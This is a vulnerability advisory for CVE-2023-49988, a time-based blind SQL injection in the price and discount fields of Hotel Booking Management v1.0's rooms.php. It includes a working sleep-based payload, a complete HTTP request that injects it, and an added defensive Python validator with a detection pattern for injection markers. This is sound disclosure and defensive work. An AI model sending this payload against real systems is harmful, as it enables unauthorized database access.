# Hotel Booking Management v1.0 - SQL Injection Vulnerability in the "npss" parameter at rooms.php
**Description**: A SQL Injection vulnerability exists in Hotel Booking Management v1.0. A malicious attacker can issue SQL commands to the MySQL database when editing the prices and discounts of lodging options through the vulnerable parameters npss, dpss, npsd, dpsd, npds, dpds, npdd, dpdd, npdst, or dpdst, none of which are validated or parameterized before reaching the query.
**Vulnerable Product Version**: Hotel Booking Management v1.0
**CVE Author**: Geraldo Alcântara
**Date**: 28/11/2023
**Confirmed on**: 19/12/2023
**CVE**: CVE-2023-49988
**Tested on**: Windows
### Steps to reproduce:
To exploit this vulnerability, an attacker navigates to /HotelBookingManagement-main/rooms.php and, while modifying the prices and discounts of lodging options, injects a SQL payload into any of the parameters npss, dpss, npsd, dpsd, npds, dpds, npdd, dpdd, npdst, or dpdst. Because the application reflects no query output, a time-based payload is used: a measurable delay in the response confirms that the injected SQL was executed by the database.
**Payload**: (select*from(select(sleep(5)))a)
### Request:
```
POST /HotelBookingManagement-main/rooms.php HTTP/1.1
Host: 192.168.68.148
Content-Length: 127
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/HotelBookingManagement-main/rooms.php
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=aih2rvevdrpegiqt8nlstav7am
Connection: close
npss=(select*from(select(sleep(5)))a)&dpss=2&npsd=800&dpsd=2&npds=1100&dpds=3&npdd=1500&dpdd=4&npdst=2000&dpdst=13&updateRooms=
```
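As an added example (not part of the advisory and not code from the Hotel Booking Management project), the following server-side check validates the POST body shown above: it rejects any of the ten price/discount fields that is not a plain number and flags values carrying time-based injection markers such as `sleep(` for alerting. The field names come from the advisory; the accepted numeric format and the sample bodies are assumptions constructed here.

```python
import re
from urllib.parse import parse_qs

# The ten price/discount fields named in the advisory. Each must be exactly
# one plain non-negative number (format assumed: up to 7 digits, 2 decimals).
PRICE_FIELDS = ("npss", "dpss", "npsd", "dpsd", "npds", "dpds",
                "npdd", "dpdd", "npdst", "dpdst")
NUMERIC_RE = re.compile(r"^\d{1,7}(\.\d{1,2})?$")

# Markers of time-based (blind) SQL injection, matched case-insensitively.
TIME_BASED_RE = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(",
                           re.IGNORECASE)


def validate_room_update(body: str) -> dict:
    """Check a rooms.php POST body before any value reaches the database.

    Returns {"ok": bool, "rejected": {field: reason_or_value},
             "suspicious": [fields carrying time-based SQLi markers]}.
    parse_qs percent-decodes values, so an encoded payload is seen as-is.
    """
    params = parse_qs(body, keep_blank_values=True)
    rejected = {}
    suspicious = []
    for name in PRICE_FIELDS:
        values = params.get(name, [])
        if len(values) != 1:
            rejected[name] = "missing or repeated"
            continue
        value = values[0]
        if not NUMERIC_RE.fullmatch(value):
            rejected[name] = value
            if TIME_BASED_RE.search(value):
                suspicious.append(name)
    return {"ok": not rejected, "rejected": rejected, "suspicious": suspicious}


# Constructed sample bodies: the advisory's payload in npss, and a benign update.
MALICIOUS_BODY = ("npss=(select*from(select(sleep(5)))a)&dpss=2&npsd=800&dpsd=2"
                  "&npds=1100&dpds=3&npdd=1500&dpdd=4&npdst=2000&dpdst=13&updateRooms=")
BENIGN_BODY = ("npss=500&dpss=2&npsd=800&dpsd=2&npds=1100&dpds=3"
               "&npdd=1500&dpdd=4&npdst=2000&dpdst=13&updateRooms=")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        print(label, validate_room_update(body))
```

Input validation of this kind limits the attack surface but is not the fix on its own; the update statement in rooms.php must also bind these values as query parameters rather than concatenating them into SQL.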
**Discoverer(s)/Credits**: Geraldo Alcântara